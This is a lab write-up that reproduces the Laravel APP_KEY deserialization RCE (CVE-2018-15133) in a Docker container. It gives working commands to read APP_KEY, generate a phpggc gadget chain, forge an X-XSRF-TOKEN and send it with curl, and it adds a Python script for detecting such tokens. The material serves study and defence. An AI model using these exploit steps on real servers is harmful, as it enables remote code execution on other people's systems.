
laravel

0x00 Setting up the vulnerable environment

https://hub.docker.com/r/kozmico/laravel-poc-cve-2018-15133

https://github.com/kozmic/laravel-poc-CVE-2018-15133

docker pull kozmico/laravel-poc-cve-2018-15133

docker run -d -p 8000:8000 kozmico/laravel-poc-cve-2018-15133

0x01 Reproducing the vulnerability

Obtain the APP_KEY

$ docker exec -it $(docker ps --latest --quiet) grep -e \^APP_KEY /var/www/html/laravel/.env

APP_KEY=base64:9UZUmEfHhV7WXXYewtNRtCxAYdQt44IAgJUKXk2ehRk=

Deserialization payload generation tool

$ git clone https://github.com/iansangaji/laravel-rce-cve-2018-15133.git

$ cd laravel-rce-cve-2018-15133

$ php ./phpggc Laravel/RCE1 system id -b

Tzo0MDoiSWxsdW1pbmF0ZVxCcm9hZGNhc3RpbmdcUGVuZGluZ0Jyb2FkY2FzdCI6Mjp7czo5OiIAKgBldmVudHMiO086MTU6IkZha2VyXEdlbmVyYXRvciI6MTp7czoxMzoiACoAZm9ybWF0dGVycyI7YToxOntzOjg6ImRpc3BhdGNoIjtzOjY6InN5c3RlbSI7fX1zOjg6IgAqAGV2ZW50IjtzOjI6ImlkIjt9

Exploit generation

$ git clone https://github.com/kozmic/laravel-poc-CVE-2018-15133.git

$ cd laravel-poc-CVE-2018-15133

$ php cve-2018-15133.php 9UZUmEfHhV7WXXYewtNRtCxAYdQt44IAgJUKXk2ehRk= Tzo0MDoiSWxsdW1pbmF0ZVxCcm9hZGNhc3RpbmdcUGVuZGluZ0Jyb2FkY2FzdCI6Mjp7czo5OiIAKgBldmVudHMiO086MTU6IkZha2VyXEdlbmVyYXRvciI6MTp7czoxMzoiACoAZm9ybWF0dGVycyI7YToxOntzOjg6ImRpc3BhdGNoIjtzOjY6InN5c3RlbSI7fX1zOjg6IgAqAGV2ZW50IjtzOjI6ImlkIjt9

HTTP header for POST request:
X-XSRF-TOKEN: eyJpdiI6Im9vOFwvNjN5NWpuTzV6dHpzMlhaTnp3PT0iLCJ2YWx1ZSI6IjFRbndXMjBYSklJV1paTW5YNkEwR2Njd010SkJuUE5JTXBEUHNGOUtRWklyMGYrYjFIOE5kYkxkQ2tMRGx3K3MyUU1yS2ljQjU3T25sUXhaZ1RwVXVIQkZvbis5UDUyZmhZemFcL1VSQmFpK2poTW9GdzBqVmRsQ05WeStSc3NuRjRiM1dONlZsWWpJN0NLOWhJV3R5RU51cnJadlwvVjZocjRFSXdrbkJSR3QwRTFObW9adlVreHluMEFOZlRcL21KcnJCQTgzZmZFVSs0a3h4R1ZkS2lIY1VsMG9Yd2tGeTdpcWFUQnJmbEV5Tms9IiwibWFjIjoiMGUwMTI1ZDdhNjlmMGZiZGIxMGQwNzJhODk0NWRhMDIyZWFjZTMwMTNiYTllNjYxN2YzZmMxZTk5ZTEzZWI1NSJ9

POST payload

POST / HTTP/1.1
X-XSRF-TOKEN: eyJpdiI6Im9vOFwvNjN5NWpuTzV6dHpzMlhaTnp3PT0iLCJ2YWx1ZSI6IjFRbndXMjBYSklJV1paTW5YNkEwR2Njd010SkJuUE5JTXBEUHNGOUtRWklyMGYrYjFIOE5kYkxkQ2tMRGx3K3MyUU1yS2ljQjU3T25sUXhaZ1RwVXVIQkZvbis5UDUyZmhZemFcL1VSQmFpK2poTW9GdzBqVmRsQ05WeStSc3NuRjRiM1dONlZsWWpJN0NLOWhJV3R5RU51cnJadlwvVjZocjRFSXdrbkJSR3QwRTFObW9adlVreHluMEFOZlRcL21KcnJCQTgzZmZFVSs0a3h4R1ZkS2lIY1VsMG9Yd2tGeTdpcWFUQnJmbEV5Tms9IiwibWFjIjoiMGUwMTI1ZDdhNjlmMGZiZGIxMGQwNzJhODk0NWRhMDIyZWFjZTMwMTNiYTllNjYxN2YzZmMxZTk5ZTEzZWI1NSJ9
curl localhost:8000 -X POST -H 'X-XSRF-TOKEN: eyJpdiI6Im9vOFwvNjN5NWpuTzV6dHpzMlhaTnp3PT0iLCJ2YWx1ZSI6IjFRbndXMjBYSklJV1paTW5YNkEwR2Njd010SkJuUE5JTXBEUHNGOUtRWklyMGYrYjFIOE5kYkxkQ2tMRGx3K3MyUU1yS2ljQjU3T25sUXhaZ1RwVXVIQkZvbis5UDUyZmhZemFcL1VSQmFpK2poTW9GdzBqVmRsQ05WeStSc3NuRjRiM1dONlZsWWpJN0NLOWhJV3R5RU51cnJadlwvVjZocjRFSXdrbkJSR3QwRTFObW9adlVreHluMEFOZlRcL21KcnJCQTgzZmZFVSs0a3h4R1ZkS2lIY1VsMG9Yd2tGeTdpcWFUQnJmbEV5Tms9IiwibWFjIjoiMGUwMTI1ZDdhNjlmMGZiZGIxMGQwNzJhODk0NWRhMDIyZWFjZTMwMTNiYTllNjYxN2YzZmMxZTk5ZTEzZWI1NSJ9'| head -n 2
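The X-XSRF-TOKEN above is nothing more than Laravel's standard encrypted-cookie envelope: base64 of a JSON object {iv, value, mac}, where value is AES-256-CBC ciphertext and mac is HMAC-SHA256 over the base64 iv concatenated with the base64 value, keyed with the raw APP_KEY. Whoever holds APP_KEY can therefore mint envelopes the application authenticates, and on affected versions the decrypted content is passed to unserialize(). The script below is an added example written for this post, not code from the original post or from the kozmic or iansangaji repositories. It uses only the Python standard library to triage a captured token: it checks whether the MAC verifies under a given key (so a responder can confirm which key a suspicious token was minted with, which matters after a .env leak or a key rotation) and compares the ciphertext size against what a genuine XSRF-TOKEN produces. The size baseline is an assumption derived from Laravel 5.6 behaviour: the cookie plaintext is serialize() of a 40-character session token, 48 bytes, which PKCS#7 padding brings to 64 bytes of ciphertext, whereas the gadget chain above is 174 bytes of serialized PHP and pads to 176. The APP_KEY and token values are the ones shown earlier in this post; the benign-sized sample is constructed filler, not real AES output.

```python
"""Triage a Laravel encrypted cookie / X-XSRF-TOKEN envelope (stdlib only).

Added example for this post; not part of the original post or the PoC projects.
Envelope layout (Laravel Encrypter): base64(JSON{iv, value, mac}) with
  value = base64(AES-256-CBC ciphertext)
  mac   = HMAC-SHA256(key, iv_b64 || value_b64), hex encoded
"""
import base64
import hashlib
import hmac
import json

# APP_KEY read from the lab container earlier in the post (Laravel strips the
# "base64:" prefix and base64-decodes the remainder to get the raw 32-byte key).
LAB_APP_KEY = "9UZUmEfHhV7WXXYewtNRtCxAYdQt44IAgJUKXk2ehRk="

# The X-XSRF-TOKEN value the post's exploit script produced.
LAB_TOKEN = (
    "eyJpdiI6Im9vOFwvNjN5NWpuTzV6dHpzMlhaTnp3PT0iLCJ2YWx1ZSI6IjFRbndXMjBYSklJV1paTW5YNkEwR2Njd010SkJuUE5JTXBEUHNGOUtRWklyMGYrYjFIOE5kYkxkQ2tMRGx3K3MyUU1yS2ljQjU3T25sUXhaZ1RwVXVIQkZvbis5UDUyZmhZemFcL1VSQmFpK2poTW9GdzBqVmRsQ05WeStSc3NuRjRiM1dONlZsWWpJN0NLOWhJV3R5RU51cnJadlwvVjZocjRFSXdrbkJSR3QwRTFObW9adlVreHluMEFOZlRcL21KcnJCQTgzZmZFVSs0a3h4R1ZkS2lIY1VsMG9Yd2tGeTdpcWFUQnJmbEV5Tms9IiwibWFjIjoiMGUwMTI1ZDdhNjlmMGZiZGIxMGQwNzJhODk0NWRhMDIyZWFjZTMwMTNiYTllNjYxN2YzZmMxZTk5ZTEzZWI1NSJ9"
)

# Assumption (Laravel 5.6): a genuine XSRF-TOKEN encrypts serialize(<40-char
# token>) = 48 bytes, which PKCS#7 pads to exactly 64 bytes of ciphertext.
EXPECTED_XSRF_CIPHERTEXT_LEN = 64


def _b64decode(s: str) -> bytes:
    """Decode base64, tolerating missing '=' padding."""
    return base64.b64decode(s + "=" * (-len(s) % 4))


def decode_key(app_key: str) -> bytes:
    """Return the raw key bytes from an APP_KEY with or without 'base64:'."""
    if app_key.startswith("base64:"):
        app_key = app_key[len("base64:"):]
    return _b64decode(app_key)


def inspect_token(token: str, app_key: str) -> dict:
    """Parse an envelope and report MAC validity plus ciphertext size.

    Keys of the returned dict:
      mac_ok         HMAC-SHA256(key, iv_b64 || value_b64) equals "mac"
      iv_len         decoded IV length (16 for AES-CBC)
      ciphertext_len decoded ciphertext length in bytes
      oversized      ciphertext_len exceeds the genuine-token baseline
    """
    payload = json.loads(_b64decode(token))
    # json.loads turns PHP's "\/" escapes back into "/", which is the form
    # Laravel hashed when it computed the MAC.
    iv_b64, value_b64, mac_hex = payload["iv"], payload["value"], payload["mac"]
    expected = hmac.new(
        decode_key(app_key), (iv_b64 + value_b64).encode(), hashlib.sha256
    ).hexdigest()
    ciphertext = _b64decode(value_b64)
    return {
        "mac_ok": hmac.compare_digest(expected, mac_hex),
        "iv_len": len(_b64decode(iv_b64)),
        "ciphertext_len": len(ciphertext),
        "oversized": len(ciphertext) > EXPECTED_XSRF_CIPHERTEXT_LEN,
    }


def make_token(iv: bytes, ciphertext: bytes, app_key: str) -> str:
    """Wrap (iv, ciphertext) in Laravel's envelope with a valid MAC.

    Used only to build a benign-sized comparison sample; the ciphertext passed
    in here is constructed filler, not real AES output.
    """
    iv_b64 = base64.b64encode(iv).decode()
    value_b64 = base64.b64encode(ciphertext).decode()
    mac = hmac.new(
        decode_key(app_key), (iv_b64 + value_b64).encode(), hashlib.sha256
    ).hexdigest()
    envelope = json.dumps({"iv": iv_b64, "value": value_b64, "mac": mac})
    return base64.b64encode(envelope.encode()).decode()


# Constructed sample: 16-byte IV, 64 bytes of filler, MAC under the lab key.
SAMPLE_BENIGN_TOKEN = make_token(bytes(range(16)), bytes(range(64)), LAB_APP_KEY)

if __name__ == "__main__":
    for name, tok in (("post exploit token", LAB_TOKEN),
                      ("benign-sized sample", SAMPLE_BENIGN_TOKEN)):
        print(name, inspect_token(tok, LAB_APP_KEY))
```

Run against a web server or proxy log, the size check alone flags the post's token (176-byte ciphertext against a 64-byte baseline) without needing the key at all; the MAC check needs the key and answers the follow-up question of whether the token was minted with the key currently in .env or with an older, leaked one. Neither check replaces the real fix, which is upgrading past the affected release and rotating a key that may have been exposed.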

0x02 Vulnerability analysis

https://xz.aliyun.com/t/6533